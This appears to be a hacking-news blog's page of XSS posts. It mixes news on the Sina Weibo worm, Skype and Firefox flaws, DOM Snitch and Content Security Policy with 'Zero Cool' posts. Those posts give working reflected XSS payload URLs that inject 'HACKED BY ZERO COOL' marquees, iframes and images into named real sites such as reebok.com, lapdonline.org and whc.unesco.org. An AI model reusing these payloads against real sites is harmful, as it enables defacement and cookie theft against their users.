XSS vulnerability found by Zero Cool (XSS MASTER) on two UK Govt. website
Vulnerable Website:-
http://www.dfid.gov.uk
Showing posts sorted by relevance for query XSS. Sort by date Show all posts
Showing posts sorted by relevance for query XSS. Sort by date Show all posts
XSS in UK Gov sites found by Zero Cool
XSS vulnerability found by Zero Cool (XSS MASTER) on two UK Govt. website
Vulnerable Website:-
http://www.dfid.gov.uk
XSS vulnerability found by zero cool on (reebok,indiagames,mtv,lapdonline,unesco,pcboard)
XSS vulnerability found by zero cool on
rebook.com
bsnl1.indiagames.com
www.lapdonline.org
whc.unesco.org
cricket.com.au
http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go
http://bsnl1.indiagames.com/bpremium/index.jsp
vul link= [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>
http://www.lapdonline.org/
vul link= http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E
http://www.mtv.co.uk/
vul link = http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E&op=Search
http://www.pcboard.com.pk/
vul link= [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>
http://whc.unesco.org/
vul link =http://whc.unesco.org/en/list/?search=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Cimg+src%3D%22http%3A%2F%2Fimg204.imageshack.us%2Fimg204%2F1322%2Fzeropk.png%22+img%3E&searchSites=&search_by_country=&search_yearinscribed=&type=&themes=&media=®ion=&criteria_restrication=&order=
html injection vul in cricket.com.au also found by zero cool
http://cricket.com.au/searchresult/%3Cimg%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/img%3E
XSS Vulnerability Found On linux.com
XSS Vulnerability Found On linux.com
Vulnerable Site:-
Vulnerable Link:-
XSS Worm on Chinese Twitter
Users of Sina Weibo, the Chinese Twitter alternative, were targeted by a cross-site scripting (XSS) worm spreading through a vulnerability on the micro blogging site.
With over 140 million users, Sina Weibo is the most popular social networking site in China, a country where both Twitter and Facebook are banned. The site's administrators announced that an worm exploiting an XSS weakness hit the platform on Tuesday evening. The worm propagated through messages that lured users with videos, pictures and software. For example some advertised bloopers from a new film, while others nude pictures of Chinese actress Fan Bingbing. Clicking on the included links forced users to re-post the spam messages from their own accounts, therefore helping the worm spread.
The attack was apparently launched from an account called @hellosamy, a name possibly chosen as a tribute to the Samy (Spacehero) worm released on MySpace back in 2005.
The work of security enthusiast Samy Kamkar, Spacehero was the first large-scale worm to spread on a social network by exploiting a cross-site scripting vulnerability and paved the way for many similar attacks that have occurred since then.
There is barely any social network left that hasn't been affected by such a worm. Some of them have had to deal with such problems multiple times and on some occasions the attacks distributed malware or spam.
There doesn't seem to have been any malicious component behind the Weibo worm, though, except for its spreading mechanism.
When such attacks happen if webmasters are not quick enough there is a high risk that the worms will mutate as other users modify the code and launch their own versions. In this case, the Weibo staff plugged the hole in around one hour, which is a rather long time for such an attack.
With over 140 million users, Sina Weibo is the most popular social networking site in China, a country where both Twitter and Facebook are banned. The site's administrators announced that an worm exploiting an XSS weakness hit the platform on Tuesday evening. The worm propagated through messages that lured users with videos, pictures and software. For example some advertised bloopers from a new film, while others nude pictures of Chinese actress Fan Bingbing. Clicking on the included links forced users to re-post the spam messages from their own accounts, therefore helping the worm spread.
The attack was apparently launched from an account called @hellosamy, a name possibly chosen as a tribute to the Samy (Spacehero) worm released on MySpace back in 2005.
The work of security enthusiast Samy Kamkar, Spacehero was the first large-scale worm to spread on a social network by exploiting a cross-site scripting vulnerability and paved the way for many similar attacks that have occurred since then.
There is barely any social network left that hasn't been affected by such a worm. Some of them have had to deal with such problems multiple times and on some occasions the attacks distributed malware or spam.
There doesn't seem to have been any malicious component behind the Weibo worm, though, except for its spreading mechanism.
When such attacks happen if webmasters are not quick enough there is a high risk that the worms will mutate as other users modify the code and launch their own versions. In this case, the Weibo staff plugged the hole in around one hour, which is a rather long time for such an attack.
-News Source (Softpedia)
XSS Vulnerability on bluedart (found by soumyabrata)
XSS Vulnerability on bluedart has been found by soumyabrata
He said that the search box is dom based XSS vulnerable.
vulnerable website:-
SQL & XSS Vulnerability Found on Facebook Application
Zero strikes again and again the victim is Facebook. This time he found SQL-i and also XSS vulnerability on 2 Facebook applications.
2 infected applications are:-
1. Ebook
2. ireadit
SQL-i vulnerability on Ebook Application
Link:-
http://apps.facebook.com/ebokapp/
XSS Vulnerability on ireadit ApplicationLink:-
http://apps.facebook.com/ireadit/
Skype is Still Vulnerable
An Armenian hacker is claiming that Skype has failed to learn from prior security lessons, falling victim to a cross-site scripting (XSS) vulnerability similar to one it patched in May, which would allow users to redirect victims to unwanted websites or run arbitrary code. The May vulnerability allowed users to fool the Mac client of Skype into running arbitrary code as the client didn't check, or sanitise, instant messages to ensure they were free of malicious code.
While Skype issued a low-priority patch at the time, a 28-year-old Armenian-based security engineer, Levent "noptrix" Kayan, claimed on Wednesday night that a similar XSS vulnerability existed elsewhere in Skype's software. He said that the failure to sanitise certain user information or the output rendered in Skype clients could still allow code to be executed.
In particular, Kayan claimed that he could see remote users' session information, which he said a malicious user could utilise to masquerade as the remote user and make calls on their account. He also said it could be used to take advantage of other holes, possibly allowing full control over the PC. Both of the latest versions of Windows and Mac clients are affected.
HE told that "An attacker would need to [submit] malicious code. The victim doesn't have to do anything. He will be attacked, when he just logs into his account."
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-Skype said the vulnerability was considered a minor issue and that it had developed a fix for it which would be deployed next week.
Skype's head of information security, Adrian Asher, said that in order to exploit this, a person would have to be a validated contact of yours and one of the most frequent people you are in contact with and was therefore very unlikely to cause any issues in the real world. Nevertheless, he said the vulnerability shouldn't have existed and it would be fixed.
Additionally, Skype said that the session information that Kayan had been able to access was in relation to the web session IDs and not Skype IDs, suggesting that the attacker couldn't make calls using the exploit. It did, however, concede that it was possible for a victim's contacts to redirect them to any website using the web browser built into the Skype client, but stressed that only validated contacts would be able to do so. In the meantime, it said users should not authorise people they do not know and/or do not want to talk to.
HackLabs director, Chris Gatford, said that it was common to come across these sorts of vulnerabilities in the work penetration testing of client systems his company does.
"I would suggest that 80 per cent, perhaps even 90 per cent of the time, cross-site scripting vulnerabilities are present," he said.
Gatford mentioned the previous XSS vulnerability in the Skype client and thought that it was surprising that Skype had not patched all of its input validation problems when it was previously brought to its attention. "This would be a simple fix for them. To be honest, I'm kind of surprised they didn't learn their lesson the first time and extend the fix system-wide then."
-News Source (ZDNet)
Mozilla Fixed Cross Site Ccripting (XSS) Flaws & Released Firefox Version 16.0.2
Mozilla Fixed Cross Site Ccripting (XSS) Flaws & Released Firefox Version 16.0.2
Serious security hole in Mozilla Firefox has been fixed. Mozilla has announced availability of Firefox version 16.0.2, an emergency update to address a serious flaw in the way the browser treats the LocationObject. According to the advisory, successful exploitation of this flaw can result in cross site scripting or code execution. The bug was first discovered by security researcher Mariusz Mlynski, which forced Mozilla
developers to release the third emergency fix in a month since the
introduction of version 16 of the popular browser. According to the Security Advisories of Mozilla Foundation -Mozilla has fixed a number of issues related to the Location object in order to enhance overall security. With Firefox 16.0.2 also the security bug in Firefox ESR 10.0.10, Thunderbird 16.0.2, Thunderbird ESR 10.0.10 & SeaMonkey 2.13.2 has been fixed. Security researcher Mariusz Mlynski reported that the true value of window.location could be shadowed by user content through the use of the valueOf method, which can be combined with some plugins to perform a cross-site scripting (XSS) attack on users. There is also the possibility of gaining arbitrary code execution if the attacker can take advantage of an add-on that interacts with the page content. Security researcher Antoine Delignat-Lavaud of the PROSECCO research team at INRIA Paris reported the ability to use property injection by prototype to bypass security wrapper protections on the Location object, allowing the cross-origin reading of the Location object. Users running older versions of Firefox are advised to update immediately using the auto-update feature built into the browser.
NASA, Sony, Adidas, SPIKE TV & Few Other Govt Websites Are Vulnerable - Said "TeamHav0k"
NASA, Sony, Adidas, SPIKE TV & Few Other Govt Websites Are Vulnerable - Said "TeamHav0k"
Newly formed hacker group named "TeamHav0k" continues their Operation XSS #OPXSS. Like earlier they have found cross site scripting vulnerability in many high profile websites. This time NASA, adidas Official Store, SPIKE TV Official Site, Brighton& Hove City council, Air Accident Investigation Branch [Govt of UK], Portal and Information Services of Tocantins [Govt of Brazil] became the victim. In a pastebin release the hacker group claimed that using the vulnerabilities an attacker can perform cookie stealing, XSS & XSSF Tunneling and such nasty things. Which indeed can create serious harm for those vulnerable sites. They have also found redirection vulnerability on the official website of Sony Global Headquarters later it was patched.
Earlier TeamHav0k figure out XSS vulnerability in the official site Huffingtonpost, EA, IGN, NYTimes & many other.
DOM Snitch XSS Testing Tool by Google
Google has released a Chrome extension that is capable of checking client-side code for cross-site scripting weaknesses and other security issues. Called DOM Snitch, the still-experimental extension intercepts JavaScript calls to potentially dangerous functions like document.write, document.cookie, HTMLElement.innerHTML and others. It records a complete stack trace allowing the user to determine if the calls can lead to cross-site scripting, mixed content, violations of the same-origin DOM policy and other issues. "DOM Snitch is intended for use by developers, testers, and security researchers alike," says Radoslav Vasilev, a Google security test engineer. The benefits of DOM Snitch include the ability to inspect DOM modifications in real-time without the need of debuggers, built-in security heuristics and nested views, as well as export capability. The easy exporting of captured DOM modifications enables developers to ask for help from their peers when troubleshooting issues. DOM Snitch is not the only security tool released by Google for developers. Its open source Skipfish and Ratproxy web application vulnerability scanners are also capable of detecting XSS, XSRF and other flaws.
JavaScript is a critical component in many web attacks, both client-side and server-side. It is used in most drive-by exploits, as well as to obfuscate malicious code on compromised websites. There are several types of cross-site scripting vulnerabilities. Persistent ones are most dangerous because they can be exploited to insert rogue code into pages permanently. Non-persisted or reflected ones can only be exploited by tricking users into opening malformed URLs.
DOM-based XSS flaws like the ones DOM Snitch helps identify are more complicated and can be exploited to load non-HTML code from a server or write code into the page directly on the client-side.
For More Info and to Download Click HERE
Firefox 4 Supports Content Security Policy
Content Security Policy is a standard developed by Mozilla designed to protect against cross sitescripting (XSS) attacks. Cross site scripting attacks use vulnerabilities in websites to inject JavaScript code into pages or urls of that site. The injected JavaScript code is then executed when visitors open a specifically prepared link or page on the website. Attacks can have serious consequences, it may for instance be possible to steal cookies from users to impersonate them on the site.
Content Security Policy has been in development for quite some time.. The basic idea behind the standard is to give webmasters a tool at hand to whitelist JavaScript, and other objects and files, that may be executed on the site. This implementation blocks all JavaScript code that is executed on the site and not in the list of allowed sites, which means that attackers cannot exploit possible XSS vulnerabilities on the website or server.
A browser supporting CSP ignores code that is not in the whitelist. Browsers who do not support CSP ignore the policy.
Content Security Protection for Users
CSP is currently only supported by Firefox 4, Thunderbird 3.3 and SeaMonkey 2.1. You can test the functionality by visiting this test page.
Twitter recently announced that they have added CSP to their mobile version, accessible under mobile.twitter.com. Users who use one of the aforementioned browsers are protected from XSS attacks on that website.
The engineers on Twitter removed all JavaSCript from code and implemented the CSP header. They then restricted the header to Firefox 4 users and created a rule set to allow JavaScript from their assets. This included the content deliver network used to deliver stylesheets and user profiles.
Unexpected issues were encountered by the developers. They noticed for instance that some Firefox add-ons were inserting JavaScript on page load, which triggered a threat report. The Twitter engineers noticed furthermore that some ISPs inserted JavaScript code or altered image tags for caching reasons.
They managed to resolve those problems by mandating SSL for all Firefox 4 users who access the mobile Twitter web site.
A test with Firebug shows that the mobile version of Twitter is indeed using the policy on site. Please note that Twitter makes a user agent check and is very restrictive about it. Firefox 5 or Firefox 6 users won’t get the policy currently.
Content Security Protection for Webmasters
Webmasters may have some work at hand to add support for CSP to their website. JavaScript code that is directly embedded in documents will not be executed anymore, which has several implications. Webmasters need to move the code to external JavaScript files.
Policies are specified with the X-Content-Security-Policy header. The header X-Content-Security-Policy: allow ‘self’ *.ghacks.net for instance allows JavaScript to be loaded from ghacks.net and all subdomains of ghacks.net.
The using CSP guide on Mozilla offers additional examples on how to set the right headers.
Browsers that do not support CSP ignore the header.
CSP offers two additional forms of protection. It mitigates clickjacking attacks. Clickjacking refers to directing a user’s mouse click to a target on another site. This is often done by using transparent frames on the original website.
Content Security Policy can also be used to mitigate packet sniffing attacks, as it allows the webmaster to specific protocols that are allowed to be used. It is for instance possible to force HTTPS only connections.
The CSP Policy directives are accessible here on Mozilla.
Next to the already mentioned options are parameters to specific hosts where images, media files, objects or fonts may be loaded from.
Plugins are available for WordPress and Drupal that add the policy to supported websites automatically when activated.
Serious Vulnerabilities Found By Deepanker Verma on Online Shopping Website
Serious Vulnerabilities Found By Deepanker Verma on shopping.indiatimes.com
Vulnerable Website:-
http://shopping.indiatimes.com/
According To the Hacker:-
"IndiaTimes shopping website has some serious XSS vulnerabilities which can lead to cookie stealing of users. And this may cause some serious loss to users. After going through some pages of the website, we (Shadab and me ) have found that the website is vulnerable to XSS injections and malicious scripts can be injected on the website."
Here are some screen shots submitted by the hacker to prove the vulnerability:-
XSS on the login Page
java-script Injection Vulnerability
Vulnerability on the product page
Cookie Stealing Vulnerability
iframe vulnerability
above screen shots are clearly saying that this website is truly vulnerable and has lots of loop holes, one black hat can also inject malicious codes and do marvellous harm
Official Website of National Geographic is Vulnerable
Official Website of National Geographic is Vulnerable
Vulnerability found by an Indian hacker named Akshay AKA 0z0n3 in the official website of National Geographic. According to the hacker Nat Geo is vulnerable to non-persistent XSS. The vulnerability has also been reported to the Nat Geo but still the status is unfixed. To know the vulnerable link click here. Also we would like to give you reminder that earlier in 2011 another Indian hacker named Zero has found XSS in the official website of Discovery.com.
Brief About National Geographic:- Is a commercially abbreviated and trademarked as Nat Geo, is a subscription television channel that airs non-fiction television programs produced by the National Geographic Society. Like History and the Discovery Channel, the channel features documentaries with factual content involving nature, science, culture, and history. The channel is owned primarily by Fox Cable Networks, a division of News Corporation. Its primary sister network worldwide, including the United States.
Two Young Researchers Found Vulnerability in Microsoft Windows Live Which Could Lead ID-Theft
Two Young Researchers Found Security Flaws in Microsoft Windows Live Which Could Lead Identity Theft
Recently two young security researchers of Morocco named Abdeljalil S'hit and Yasser Aboukir discovered a serious vulnerability in Microsoft's Windows Live service. The vulnerability has been reported to Microsoft, but unfortunately the software giant neither gave compastion nor did any comment about the said topic. In a report ZDNet said the vulnerability in question leveraged Cross-Site Scripting (XSS) to execute a malicious script.
More specifically, the two researchers managed to cause an error on the Windows Live login page (as you can see above), and once the victim clicked on the "Continue" button, their malicious script would be executed. XSS flaw means that an attacker could impersonate a Windows Live user by gaining full control of the victim's cookies. Combined with social engineering, this technique could be used to steal a victim's Windows Live identity with ease.
The last update we got from Microsoft is saying - "We quickly addressed the vulnerability in question to help keep customers protected and appreciate the researchers using Coordinated Vulnerability Disclosure to assist in us working toward a fix in a coordinated manner"
XSS Vulnerability Found By Hitcher on the Official Website of Tom Cruise & Delhi Chamber Of Commerce
Pakistani Hacker Hitcher found non-persistent XSS Vulnerability on the Official Website of Famous Hollywood Actor Tom Cruise and also on the Delhi Chamber Of Commerce website.
Tom Crusie:-
Vulnerable Website:-
Vulnerable Link:-
Delhi Chamber Of Commerce:-
Vulnerable Website:-
Vulnerable Link:-
XSS Vulnerability Found By Konvic Jack On windowsitpro.com
Non-persistent XSS vulnerability found by Konvic Jack on the official website windowsitpro.com
About Windows It Pro:-
Windows IT Pro is the leading independent community for IT professionals deploying Microsoft Windows server and client applications and technologies.
Vulnerable Site:-
http://www.windowsitpro.com/
Vulnerable Link:-
